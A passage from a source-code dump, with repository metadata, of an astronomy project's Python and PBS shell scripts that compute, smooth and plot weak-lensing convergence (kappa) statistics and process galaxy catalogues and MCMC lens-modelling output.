np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIShalo_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts18_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_SIShalo_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\n\nmedian1,stddev1 = compute(kappa_counts1)\nmedian1_gal,stddev1_gal = compute(kappa_counts1_gal)\nmedian1_galgamma,stddev1_galgamma = compute(kappa_counts1_galgamma)\nmedian2,stddev2 = compute(kappa_counts2)\nmedian2_,stddev2_ = compute(kappa_counts2_)\nmedian3,stddev3 = compute(kappa_counts3)\nmedian3_,stddev3_ = compute(kappa_counts3_)\nmedian4,stddev4 = compute(kappa_counts4)\nmedian4_,stddev4_ = compute(kappa_counts4_)\nmedian5,stddev5 = compute(kappa_counts5)\nmedian5_,stddev5_ = compute(kappa_counts5_)\nmedian6,stddev6 = compute(kappa_counts6)\nmedian7,stddev7 = compute(kappa_counts7)\nmedian7_,stddev7_ = compute(kappa_counts7_)\nmedian8,stddev8 = compute(kappa_counts8)\nmedian8_,stddev8_ = compute(kappa_counts8_)\nmedian9,stddev9 = compute(kappa_counts9)\nmedian9_,stddev9_ = compute(kappa_counts9_)\nmedian10,stddev10 = compute(kappa_counts10)\nmedian10_,stddev10_ = compute(kappa_counts10_)\nmedian11,stddev11 = compute(kappa_counts11)\nmedian11_,stddev11_ = compute(kappa_counts11_)\nmedian12,stddev12 = compute(kappa_counts12)\nmedian12_,stddev12_ = compute(kappa_counts12_)\nmedian13,stddev13 = compute(kappa_counts13)\nmedian13_,stddev13_ = compute(kappa_counts13_)\nmedian14,stddev14 = compute(kappa_counts14)\nmedian14_,stddev14_ = compute(kappa_counts14_)\nmedian15,stddev15 = compute(kappa_counts15)\nmedian15_,stddev15_ = compute(kappa_counts15_)\nmedian16,stddev16 = compute(kappa_counts16)\nmedian16_,stddev16_ = compute(kappa_counts16_)\nmedian17,stddev17 = compute(kappa_counts17)\nmedian17_,stddev17_ = compute(kappa_counts17_)\nmedian18,stddev18 = compute(kappa_counts18)\nmedian18_,stddev18_ = compute(kappa_counts18_)\n\nhead = \"median_1+1/r+ median_1+1/r+gamma+ std_1+1/r+ std_1+1/r+gamma+ \"\nnp.savetxt('%skappacomputebias_%s_%s_%s_%s.lst' % (root,lens,inner,mag,rad),np.c_[np.array([median1_gal,median2_,median3_,median4_,median5_,median6,median7_,median8_,median9_,median10_,median11_,median12_,median13_,median14_,median15_,median16_,median17_,median18_]),np.array([median1_galgamma,median2,median3,median4,median5,median1,median7,median8,median9,median10,median11,median12,median13,median14,median15,median16,median17,median18]),np.array([stddev1_gal,stddev2_,stddev3_,stddev4_,stddev5_,stddev6,stddev7_,stddev8_,stddev9_,stddev10_,stddev11_,stddev12_,stddev13_,stddev14_,stddev15_,stddev16_,stddev17_,stddev18_]),np.array([stddev1_galgamma,stddev2,stddev3,stddev4,stddev5,stddev1,stddev7,stddev8,stddev9,stddev10,stddev11,stddev12,stddev13,stddev14,stddev15,stddev16,stddev17,stddev18])],fmt='%s',delimiter='\\t',newline='\\n',header=head)\n" }, { "alpha_fraction": 0.5728632211685181, "alphanum_fraction": 0.6058915257453918, "avg_line_length": 36.655460357666016, "blob_id": "6e8d944eeaf82650ebd328918079c18fcd44b2e1", "content_id": "402a3e11b55d73f3831307cf0be6d5f67413586e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4481, "license_type": "no_license", "max_line_length": 199, "num_lines": 119, "path": "/python/catalogue_utilities/kappaforKen.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Produces a normalized distribution with the kappa axis attached. the third axis is the smooth distribution\n\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\n\nmin_kappa = -0.10\nmax_kappa = 1\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\n#root = \"/Users/cerusu/Dropbox/\"\nroot = \"/Volumes/LaCieSubaru/kapparesults/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n sum = np.sum(kappa_all_)\n #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n #std = np.sqrt(meanX2 - meanX**2)\n \n med = 0\n i = 0\n ok = False\n while (med <= sum/2.0) and (ok == False):\n med = med + kappa_all_[i]\n if med > sum/2.0:\n median = kappa_values[i] + halfwidth\n ok = True\n if med == sum/2.0:\n median = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n \n std = 0\n ok = False\n i = 0\n while (std <= sum * 0.16) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum * 0.16:\n std1_ = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.16:\n std1_ = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n \n std = 0\n ok = False\n i = 0\n while (std <= sum*0.84) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum*0.84:\n std1 = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.84:\n std1 = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n \n stddev = (std1 - std1_) / 2\n \n return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n \"\"\"smooth the data using a window with requested size.\n\n This method is based on the convolution of a scaled window with the signal.\n The signal is prepared by introducing reflected copies of the signal\n (with the window size) in both ends so that transient parts are minimized\n in the begining and end part of the output signal.\n \n input:\n x: the input signal\n window_len: the dimension of the smoothing window; should be an odd integer\n window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n flat window will produce a moving average smoothing.\n \n output: the smoothed signal\n\n see also:\n \n numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n scipy.signal.lfilter\n \n TODO: the window parameter could be the window itself if an array instead of a string\n NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n \"\"\"\n \n if x.ndim != 1:\n raise ValueError, \"smooth only accepts 1 dimension arrays.\"\n if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n raise ValueError, \"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\"\n if x.size < window_len:\n raise ValueError, \"Input vector needs to be bigger than window size.\"\n\n if window_len<3:\n return x\n s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n if window == 'flat': #moving average\n w=np.ones(window_len,'d')\n else:\n w=eval('np.'+window+'(window_len)')\n y=np.convolve(w/w.sum(),s,mode='valid')\n return y\n\nkappa = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_chameleon_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\nmedian,stddev,kappa_values = statistics(kappa,bin_stat,min_kappa,max_kappa)\nkappa = kappa / np.sum(kappa * np.abs((kappa_values[:-1]+halfwidth)))\n\nwinlen = 12\n#smooth(kappa_3,winlen,'flat')\n#smooth(kappa_3,winlen,'hanning')\n#smooth(kappa_3,winlen,'hamming')\n#smooth(kappa_3,winlen,'bartlett')\n#smooth(kappa_3,winlen,'blackman')\ndata = np.c_[kappa_values[:-1],kappa,smooth(kappa,winlen,'flat')[(winlen/2-1):-(winlen/2)]]\nnp.savetxt('%skappaforKen_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_chameleon_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat' % root, data, fmt='%.4f %.3e %.3e')\n" }, { "alpha_fraction": 0.5834031701087952, "alphanum_fraction": 0.7443419694900513, "avg_line_length": 48.70833206176758, "blob_id": "f3f346bcf1cfadd601b142e9486dc9567290f770", "content_id": "11c121075ebf30581a6660606d216c43353f8652", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1193, "license_type": "no_license", "max_line_length": 120, "num_lines": 24, "path": "/python/scripts/NAOJ/batch2_insertstars_.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb2_.out\n#PBS -e Logb2_.err\n#PBS -N 2_\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\n" }, { "alpha_fraction": 0.5772050023078918, "alphanum_fraction": 0.6409316658973694, "avg_line_length": 44.71891784667969, "blob_id": "386ac8c0f26c38475d8d94105938beb187443ca6", "content_id": "fdd48be3cb4c5e6db5abe6cfb59b2b92dfb6471e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8458, "license_type": "no_license", "max_line_length": 201, "num_lines": 185, "path": "/python/plot_utilities/plotkappa_test.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots the equivalent of Figure 13 in Rusu et al. 2017\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\n\nmin_kappa = -0.20\nmax_kappa = 1\nmin_kappa_plot = -0.2\nmax_kappa_plot = 0.3\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\nfile = str(sys.argv[1])\n#root = \"/Users/cerusu/Dropbox/\"\nroot = \"/Volumes/LaCieSubaru/kapparesults/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n sum = np.sum(kappa_all_)\n #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n #std = np.sqrt(meanX2 - meanX**2)\n\n med = 0\n i = 0\n ok = False\n while (med <= sum/2.0) and (ok == False):\n med = med + kappa_all_[i]\n if med > sum/2.0:\n median = kappa_values[i] + halfwidth\n ok = True\n if med == sum/2.0:\n median = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum * 0.16) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum * 0.16:\n std1_ = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.16:\n std1_ = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum*0.84) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum*0.84:\n std1 = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.84:\n std1 = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n stddev = (std1 - std1_) / 2\n\n return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n \"\"\"smooth the data using a window with requested size.\n\n This method is based on the convolution of a scaled window with the signal.\n The signal is prepared by introducing reflected copies of the signal\n (with the window size) in both ends so that transient parts are minimized\n in the begining and end part of the output signal.\n\n input:\n x: the input signal\n window_len: the dimension of the smoothing window; should be an odd integer\n window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n flat window will produce a moving average smoothing.\n\n output: the smoothed signal\n\n see also:\n\n numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n scipy.signal.lfilter\n\n TODO: the window parameter could be the window itself if an array instead of a string\n NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError, \"smooth only accepts 1 dimension arrays.\"\n if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n raise ValueError, \"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\"\n if x.size < window_len:\n raise ValueError, \"Input vector needs to be bigger than window size.\"\n\n if window_len<3:\n return x\n s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n if window == 'flat': #moving average\n w=np.ones(window_len,'d')\n else:\n w=eval('np.'+window+'(window_len)')\n y=np.convolve(w/w.sum(),s,mode='valid')\n return y\n\nplt.clf()\n\nkappa_0 = np.loadtxt(file, usecols=[0], unpack=True)\nmedian0,stddev0,kappa_values = statistics(kappa_0,bin_stat,min_kappa,max_kappa)\nkappa_0 = kappa_0 / np.sum(kappa_0 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_1 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median1,stddev1,kappa_values = statistics(kappa_1,bin_stat,min_kappa,max_kappa)\n#kappa_1 = kappa_1 / np.sum(kappa_1 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_2 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median2,stddev2,kappa_values = statistics(kappa_2,bin_stat,min_kappa,max_kappa)\n#kappa_2 = kappa_2 / np.sum(kappa_2 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_3 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median3,stddev3,kappa_values = statistics(kappa_3,bin_stat,min_kappa,max_kappa)\n#kappa_3 = kappa_3 / np.sum(kappa_3 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_4 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median4,stddev4,kappa_values = statistics(kappa_4,bin_stat,min_kappa,max_kappa)\n#kappa_4 = kappa_4 / np.sum(kappa_4 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_5 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median5,stddev5,kappa_values = statistics(kappa_5,bin_stat,min_kappa,max_kappa)\n#kappa_5 = kappa_5 / np.sum(kappa_5 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_6 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_45_gal_45_gamma_45_oneoverr_120_gal_23_meds_increments2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median6,stddev6,kappa_values = statistics(kappa_6,bin_stat,min_kappa,max_kappa)\n#kappa_6 = kappa_6 / np.sum(kappa_6 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#s = \"med=%.3f std=%.3f LOS=%d\" % (median,std1,LOS)\ns0 = \"med=%.3f std=%.3f\" % (median0,stddev0)\n#s1 = \"med=%.3f std=%.3f\" % (median1,stddev1)\n#s2 = \"med=%.3f std=%.3f\" % (median2,stddev2)\n#s3 = \"med=%.3f std=%.3f\" % (median3,stddev3)\n#s4 = \"med=%.3f std=%.3f\" % (median4,stddev4)\n#s5 = \"med=%.3f std=%.3f\" % (median5,stddev5)\n#s6 = \"med=%.3f std=%.3f\" % (median6,stddev6)\nplt.subplot(1,1,1)\nax = plt.subplot(1,1,1)\nax.tick_params(labelsize=15)\nplt.xlim(min_kappa_plot, max_kappa_plot)\nplt.ylim(0, 0.1)\n\nplt.plot(kappa_values[:-1][::1],kappa_0[::1],linewidth=2, label ='', linestyle=':') # every 1th point\nax.text(0.6, 0.90, s0, fontsize=10, transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_1[::1], linewidth=2, label ='$120: 1 + 1/r + \\gamma$', linestyle='-.') # every 1th point\n#ax.text(0.6, 0.85, s1, fontsize=10, transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_2[::1], linewidth=2, label ='$120: 1 + \\gamma$; 45: 1', linestyle='--') # every 1th point\n#ax.text(0.6, 0.80, s2, fontsize=10, transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_3[::1], linewidth=2, label ='$120: 1 + 1/r + \\gamma$; 45: 1') # every 1th point\n#ax.text(0.6, 0.75, s3, fontsize=10,transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_4[::1],linewidth=2, label ='$120: 1 + 1/r + \\gamma$; 45: 1 + 1/r') # every 1th point\n#ax.text(0.6, 0.70, s4, fontsize=10,transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_5[::1],linewidth=2, label ='$45: 1 + \\gamma$; 120: 1') # every 1th point\n#ax.text(0.6, 0.65, s5, fontsize=10,transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_6[::1],linewidth=2, label ='$45: 1 + 1/r + \\gamma$; 120: 1') # every 1th point\n#ax.text(0.6, 0.60, s6, fontsize=10,transform=ax.transAxes)\n\nwinlen = 12\n#smooth(kappa_3,winlen,'flat')\n#smooth(kappa_3,winlen,'hanning')\n#smooth(kappa_3,winlen,'hamming')\n#smooth(kappa_3,winlen,'bartlett')\n#smooth(kappa_3,winlen,'blackman')\n#plt.plot(kappa_values[:-1],smooth(kappa_3,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=2, label ='$1 + 1/r + \\gamma$')\nplt.plot(kappa_values[:-1],smooth(kappa_0,winlen,'flat')[(winlen/2-1):-(winlen/2)],linewidth=2, label ='$1 + 1/r + \\gamma$')\nplt.xlabel(r'$\\kappa$', fontsize=20)\nplt.ylabel(r'normalized counts', fontsize=20)\nplt.legend(loc=\"lower right\")\nplt.savefig('%s.png' % file[:-4], dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6178571581840515, "alphanum_fraction": 0.6642857193946838, "avg_line_length": 34, "blob_id": "9ee06cbe91643dd925594d269ead5948d92c183c", "content_id": "e4e43b0a26baee2e6901032640da9e0e96343692", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 280, "license_type": "no_license", "max_line_length": 73, "num_lines": 8, "path": "/python/catalogue_utilities/converttods9reg.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# read RA and DEC from a file and output a corresponding DS9 regions file\nimport numpy as np\nimport sys\ninput = str(sys.argv[1])\nout = input[:-4] + '_reg.cat'\n\ncat = np.loadtxt(input, usecols = [0,1], unpack=True)\nnp.savetxt(out,cat.T,fmt='fk5;circle( %.6f , %.6f, 0.0005)')\n" }, { "alpha_fraction": 0.6476462483406067, "alphanum_fraction": 0.6811697483062744, "avg_line_length": 41.45454406738281, "blob_id": "4a0130e9b736eca7f5875e685637bc822af2df4a", "content_id": "b3f532ba3aa1ee9481f178434edeb3010c0e878e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1402, "license_type": "no_license", "max_line_length": 200, "num_lines": 33, "path": "/python/catalogue_utilities/combinelephare.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to combine two LePhare output catalogues: one which considers non-detections, and one which assumes they are non-observations. This is because some non-detections would not execute.\n# Use after running Lephare, where Lephare is used with the inputs from converttolephare_ugrizYJHK.py\n# Use as: combinelephare.py /Users/eduardrusu/lephare_dev/test/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forlepharewithbpz.cat.MAG_BC03_I09.lephareout\n##########################\n\nimport numpy as np\nimport sys\n\nfile = str(sys.argv[1])\n\nfile_noobs = file[:-28] + \"_noobs.cat.MAG_BC03_I09.lephareout\"\n\nid = 0\nz = 1\nchi_best = 5\nchi_star = 6\nmass_best = 43\nmass_inf = 44\nmass_med = 45\nmass_sup = 46\n\ndata = np.loadtxt(file,usecols=(id,z,chi_best,chi_star,mass_best,mass_inf,mass_med,mass_sup),unpack=True)\ndata_noobs = np.loadtxt(file_noobs,usecols=(id,z,chi_best,chi_star,mass_best,mass_inf,mass_med,mass_sup),unpack=True)\n\nfor i in range(len(data[id])):\n if data[:,i][z] == -99.0:\n data[:,i] = data_noobs[:,i]\n\nfileout = file[:-28] + \"_combined.cat.MAG_BC03_I09.lephareout\"\nstr = \"ID \\t chi_best \\t chi_star \\t mass_best \\t mass_inf \\t mass_med \\t mass_sup\"\ndataout = np.c_[data[0],data[2],data[3],data[4],data[5],data[6],data[7]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.3f \\t %.3f \\t %.3f \\t %.3f ')\n\n" }, { "alpha_fraction": 0.46399998664855957, "alphanum_fraction": 0.656000018119812, "avg_line_length": 34.71428680419922, "blob_id": "e5c201234702e22c28a48bca53f4b76ccc595d4f", "content_id": "8726ef4834640df82f0b57a2e334095b679059db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 750, "license_type": "no_license", "max_line_length": 97, "num_lines": 21, "path": "/python/catalogue_utilities/samplecombinedgaussians.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Combines samples from multiple Gaussians with asymmetric error bars\n\nimport numpy as np\nimport pylab as plt\n\nsamples = 5000\n\nmed = np.array([0.316,0.371,0.349,0.332,0.275,0.291,0.360,0.275,0.360,0.349,0.337])\nstdsup = np.array([+0.041,+0.033,+0.036,+0.028,+0.052,+0.034,+0.043,+0.031,+0.019,+0.038,+0.047])\nstdinf = np.array([-0.007,-0.041,-0.019,-0.012,-0.002,-0.003,-0.003,-0.013,-0.02,-0.026,-0.013])\n\ncombined = np.array([])\nfor i in range(len(med)):\n left = med[i] - abs(med[i] - np.random.normal(med[i],abs(stdinf[i]),samples))\n right = med[i] + abs(med[i] - np.random.normal(med[i],stdsup[i],samples))\n combined = np.r_[combined,left,right]\n\nprint np.percentile(combined,[16,50,84])\nplt.clf()\nplt.hist(combined,bins=100)\nplt.show()\n" }, { "alpha_fraction": 0.49079883098602295, "alphanum_fraction": 0.5767461061477661, "avg_line_length": 64.34246826171875, "blob_id": "60c39b3180db0f56422b0decc4bbcdc02d0498da", "content_id": "79034960f01b07c2006ce7b260fe46c292dd4119", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4782, "license_type": "no_license", "max_line_length": 199, "num_lines": 73, "path": "/python/modeling_utilities/mcmc_einstmagniftimesrc_plot.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Use to plot the results of mcmc_einstmagniftime.py. After running mcmc_einstmagniftime.py I need to save the output of its terminal into terminal.dat, then I can run this code\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\nimg = 4\nfileorig = \"pointSIEgamma.input\"\nfileoutorig = \"pointSIEgamma_einstmagniftime_out_.dat\"\r\nfile = \"terminal.dat\"\nos.system(\"grep \\\"M_Sun/h\\\" %s > %s\" % (file,fileoutorig[:-4]+\"einst.dat\"))\nos.system(\"paste %s %s > %s\" % (fileoutorig,fileoutorig[:-4]+\"einst.dat\",fileoutorig[:-5]+\".dat\"))\nos.system(\"rm %s %s %s\" % (fileoutorig,fileoutorig[:-4]+\"einst.dat\",file))\n\nmcmc = np.loadtxt(fileoutorig[:-5]+\".dat\", usecols=[3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,26,0,1,2])\nmcmc = mcmc[mcmc[:,17]==img]\nmcmc = np.delete(mcmc,17,1)\nmcmcfinal = np.copy(mcmc)\n\n# make sure the order of images is correct:\n\nfor i in range(np.shape(mcmc)[0]):\n if i > 0:\n dist1_1 = np.sqrt((mcmc[i][0]-mcmc[0][0])**2 + (mcmc[i][1]-mcmc[0][1])**2)\n dist2_1 = np.sqrt((mcmc[i][4]-mcmc[0][0])**2 + (mcmc[i][5]-mcmc[0][1])**2)\n dist3_1 = np.sqrt((mcmc[i][8]-mcmc[0][0])**2 + (mcmc[i][9]-mcmc[0][1])**2)\n dist4_1 = np.sqrt((mcmc[i][12]-mcmc[0][0])**2 + (mcmc[i][13]-mcmc[0][1])**2)\n if np.min([dist1_1,dist2_1,dist3_1,dist4_1]) == dist1_1:\n pass\n if np.min([dist1_1,dist2_1,dist3_1,dist4_1]) == dist2_1:\n mcmcfinal[i][0] = mcmcfinal[i][4]; mcmcfinal[i][1] = mcmcfinal[i][5]; mcmcfinal[i][2] = mcmcfinal[i][6]; mcmcfinal[i][3] = mcmcfinal[i][7]\n mcmcfinal[i][4] = mcmc[i][0]; mcmcfinal[i][5] = mcmc[i][1]; mcmcfinal[i][6] = mcmc[i][2]; mcmcfinal[i][7] = mcmc[i][3]\n if np.min([dist1_1,dist2_1,dist3_1,dist4_1]) == dist3_1:\n mcmcfinal[i][0] = mcmcfinal[i][8]; mcmcfinal[i][1] = mcmcfinal[i][9]; mcmcfinal[i][2] = mcmcfinal[i][10]; mcmcfinal[i][3] = mcmcfinal[i][11]\n mcmcfinal[i][8] = mcmc[i][0]; mcmcfinal[i][9] = mcmc[i][1]; mcmcfinal[i][10] = mcmc[i][2]; mcmcfinal[i][11] = mcmc[i][3]\n if np.min([dist1_1,dist2_1,dist3_1,dist4_1]) == dist4_1:\n mcmcfinal[i][0] = mcmcfinal[i][12]; mcmcfinal[i][1] = mcmcfinal[i][13]; mcmcfinal[i][2] = mcmcfinal[i][14]; mcmcfinal[i][3] = mcmcfinal[i][15]\n mcmcfinal[i][12] = mcmc[i][0]; mcmcfinal[i][13] = mcmc[i][1]; mcmcfinal[i][14] = mcmc[i][2]; mcmcfinal[i][15] = mcmc[i][3]\nmcmc = np.copy(mcmcfinal)\nfor i in range(np.shape(mcmc)[0]):\n if i > 0:\n dist2_2 = np.sqrt((mcmc[i][4]-mcmc[0][4])**2 + (mcmc[i][5]-mcmc[0][5])**2)\n dist3_2 = np.sqrt((mcmc[i][8]-mcmc[0][4])**2 + (mcmc[i][9]-mcmc[0][5])**2)\n dist4_2 = np.sqrt((mcmc[i][12]-mcmc[0][4])**2 + (mcmc[i][13]-mcmc[0][5])**2)\n if np.min([dist2_2,dist3_2,dist4_2]) == dist2_2:\n pass\n if np.min([dist2_2,dist3_2,dist4_2]) == dist3_2:\n mcmcfinal[i][4] = mcmcfinal[i][8]; mcmcfinal[i][5] = mcmcfinal[i][9]; mcmcfinal[i][6] = mcmcfinal[i][10]; mcmcfinal[i][7] = mcmcfinal[i][11]\n mcmcfinal[i][8] = mcmc[i][4]; mcmcfinal[i][9] = mcmc[i][5]; mcmcfinal[i][10] = mcmc[i][6]; mcmcfinal[i][11] = mcmc[i][7]\n if np.min([dist2_2,dist3_2,dist4_2]) == dist4_2:\n mcmcfinal[i][4] = mcmcfinal[i][12]; mcmcfinal[i][5] = mcmcfinal[i][13]; mcmcfinal[i][6] = mcmcfinal[i][14]; mcmcfinal[i][7] = mcmcfinal[i][15]\n mcmcfinal[i][12] = mcmc[i][4]; mcmcfinal[i][13] = mcmc[i][5]; mcmcfinal[i][14] = mcmc[i][6]; mcmcfinal[i][15] = mcmc[i][7]\nmcmc = np.copy(mcmcfinal)\nfor i in range(np.shape(mcmc)[0]):\n if i > 0:\n dist3_3 = np.sqrt((mcmc[i][8]-mcmc[0][8])**2 + (mcmc[i][9]-mcmc[0][9])**2)\n dist4_3 = np.sqrt((mcmc[i][12]-mcmc[0][8])**2 + (mcmc[i][13]-mcmc[0][9])**2)\n if np.min([dist3_3,dist4_3]) == dist3_3:\n pass\n if np.min([dist3_3,dist4_3]) == dist4_3:\n mcmcfinal[i][12] = mcmcfinal[i][8]; mcmcfinal[i][13] = mcmcfinal[i][9]; mcmcfinal[i][14] = mcmcfinal[i][10]; 